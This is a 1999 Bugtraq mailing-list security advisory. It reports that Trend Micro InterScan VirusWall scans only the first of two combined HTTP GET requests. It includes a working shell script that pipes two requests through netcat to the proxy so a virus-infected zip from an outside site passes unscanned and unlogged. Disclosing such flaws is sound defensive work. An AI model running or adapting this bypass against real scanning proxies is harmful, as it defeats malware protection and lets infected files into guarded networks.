Bugtraq mailing list archives

BlackHats Advisory -- InterScan VirusWall

From: unicorn () BLACKHATS ORG (The Unicorn)
Date: Mon, 22 Feb 1999 21:31:51 +0100


                         BlackHats Security Advisory


           Release date: February 22, 1999
            Application: InterScan Viruswall for Solaris
               Severity: Any user can download binaries and virus
                         infected files though the VirusWall

              Author(s): s10 () blackhats org, unicorn () blackhats org

---
Overview:
---

        InterScan VirusWall  is part of Trend  Micro's integrated family
of virus protection  products that covers every access  point - Internet
gateways,  groupware,  e-mail and  intranet  servers,  LAN servers,  and
desktops. InterScan VirusWall  scans inbound and outbound  SMTP mail and
attachments, FTP and HTTP traffic  in real time. It automatically cleans
infected files and detects malicious Java applets and ActiveX objects.

        When two HTML GET commands are  combined in one request, of wich
the former points to a non-scanned file like a graphic image (i.e. a GIF
file) and the  latter to a possibly infected binary  or macro file, both
of the  files are  passed to  the user requesting  the data  without any
warning  or logging  by the  VirusWall. We  found that  this combination
was  sometimes  generated  by  well-known  web  browsers  like  Netscape
Communicator and Microsoft Internet Explorer during normal use.

        We informed  Trend Micro of  this vulnerability more  than three
weeks  ago. We  fully described  the  problem to  Trend Engineering  and
included an exploit  similar to the one described below  and all traffic
between the  browser and VirusWall, but  did not receive a  fix for this
problem. The explanation received was that they were unable to reproduce
it on  their systems.  Since these  systems are  used to  protect people
behind (expensive)  firewall configurations against virus  infection, we
decided to make, at least, the  administrators of these systems aware of
this exploit  that can be  used by  users behind an  InterScan VirusWall
configuration to circumvent the implemented security policy.

---
Affected systems:
---

        InterScan Viruswall for Solaris
        Implementations of  InterScan VirusWall  on other  platforms are
        likely to be vulnerable, but are not tested since we do not have
        them available

---
Workarounds/Fixes:
---

        We have  not yet received  a fix from  Trend Micro. It  might be
possible  to close  this  hole by  scanning *ALL*  data  passed in  HTTP
traffic, but  this will have a  negative influence on the  throughput of
the complete firewall configuration.

---
Example:
---

        We developed  the following exploit  that requests two  files in
one message. The first  one is a simple graphic file  (in this case form
the Trend Micro web-site) and the second one is a file containing a well
known macro-virus, which  would normally be detected and  removed by the
product. Using the netcat tool we  send this combined request out to the
world using  the VirusWall as  a proxy-server. The  information received
back is stored in a file. When later examining the file we find both the
graphic and the  virus infected contents requested.  Looking through the
logfiles no trace is found of this file seeping through the hole.

#!/bin/sh
echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
Referer: http://www.antivirus.com/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: www.antivirus.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
Referer: http://sourceofkaos.com/homes/knowdeth/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: sourceofkaos.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

" | nc viruswall 80 > the.results

        Changing the second part of  this "code" will enable downloading
any information  through the  Trend Micro InterScan  VirusWall. Probably
because the  product only acts  on the first  GET command in  a message,
while retrieving all information requested.

---
Further Study:
---

        Further study  of this vulnerability  may focus on FTP  and SMTP
traffic and the detection of malicious Java applets and ActiveX objects.


Ciao,
Unicorn.
--
======= _ __,;;;/ TimeWaster ================================================
     ,;( )_, )~\| A Truly Wise Man Never Plays
    ;; //  `--;     Leapfrog With A Unicorn...
==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======

Current thread:

Group kmem exploitable?, (continued)
- - - Group kmem exploitable? Oliver Xymoron (Feb 23)
    - Re: Pro/wuFTPD DoS Alex Belits (Feb 21)
  - ISS install.iss security hole Fyodor (Feb 20)
    - Re: ISS install.iss security hole Joel Eriksson (Feb 22)
    - Preventing remote OS detection Patrick Gilbert (Feb 22)
    - Re: Preventing remote OS detection James Lockwood (Feb 22)
    - Re: Preventing remote OS detection route () RESENTMENT INFONEXUS COM (Feb 22)
    - Re: Preventing remote OS detection Salvatore Sanfilippo (Feb 23)
    - Re: ISS install.iss security hole Peter Benie (Feb 22)
    - Re: ISS install.iss security hole Michael Warfield (Feb 22)
    - BlackHats Advisory -- InterScan VirusWall The Unicorn (Feb 22)
    - Microsoft Security Bulletin (MS99-007) aleph1 () UNDERGROUND ORG (Feb 22)